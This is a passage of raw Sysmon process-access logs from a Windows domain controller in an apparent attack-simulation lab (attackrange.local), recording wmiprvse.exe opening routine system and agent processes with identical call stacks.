Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 